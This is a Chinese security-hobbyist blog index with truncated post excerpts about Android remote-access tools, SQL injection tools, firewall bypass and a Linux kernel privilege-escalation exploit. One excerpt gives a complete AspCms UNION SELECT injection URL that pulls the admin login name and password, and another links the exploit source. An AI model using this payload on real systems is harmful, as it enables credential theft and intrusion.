小马博客

一个无聊的人,一个无聊的博客

Androrat是一个客户/服务器模式的JAVA Android应用。而Androrat这个名字也很好理解,顾名思义,是Android和RAT (Remote Access Tool)的合体。 这个工具是一个大学四年级团队的安全项目,这款应用的目的是远程操控android设备并且从中...

发布 7 条评论

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1 ———————————————————————— Powered by As...

发布 0 条评论

国外黑客发现Linux 内核2.6.37-3.8.9版本一个漏洞,成功利用该漏洞可能获得特权用户,还算新鲜,转来给大家看看。比较好用的~ http://fucksheep.org/~sd/warez/semtex.c linux 2.6.37-3.x.x x86_64, ~100 LOC   [php] /* * li...

发布 0 条评论

目前有很多网站做了rewrite,如   /?id=1 /1 /1111.php   大趋势下,攻击的门槛逐渐增高。这样有利有弊,喜欢研究的会深入钻研,另一方面只会用工具不懂原理的则充斥到大小论坛水区。 实战举例:   http://www.bxxxx...

发布 1 条评论

貌似很多朋友拿着库,用BAT 或者PHP读取TXT的形式来扫,文件太大了的话,1,2分钟估计都查不出来,因为导入库是一个不错的方法,很多都不知道怎么搭建的吧,用MSSQL或则ORACLE来搭建的,个人感觉没那必要,原因在于安装他们需要的空间...

发布 14 条评论

jSQL是一款轻量级的安全测试工具,用于发现远程数据库的漏洞信息。jSQL免费、开源、跨平台(Windows, Linux, Mac OS X, Solaris)。 Version 0.4特性 GET, POST, header, cookie methods Normal, error based, blind, time based alg...

发布 0 条评论

有时候,网络管理员使用各种各样的防火墙,对渗透测试是非常困难的,有种这样防火墙:一个允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。 当你已经拥有一台机器内部网络或者DMZ的一部分。他并非...

发布 0 条评论

注: 利用工具可以用任意语言编写其实就是发送漏洞代码就行了。一个request一个response,我尝试用过纯JS PHP JSP JavaSwing JavaFX 现在android版本都快写好了。本来打算发视频和利用工具的不过还是算了吧,懂的人自然就懂了. 演示DE...

发布 0 条评论

DroidSQLi是Android下的第一个自动化MySQL注入工具。它可以让你对基于MySQL的Web应用程序进行SQL注入攻击测试。 DroidSQLi支持以下注入技术:  - 基于时间注入 - 盲注 - 基于错误注入 - 普通注入 它会自动选择使用最好的技术,...

发布 0 条评论

前言:作者是个懒人,又犯了五月病,什么都懒得做,编辑了好几次文章,后来都不了了之了 但是时间紧迫,下个月就要跨省去外地了,看见大家好像对狗狗很有热情,所以就一口气把一篇笔记发出来了 本来没有那么长的,越写越长,本来是想...

发布 0 条评论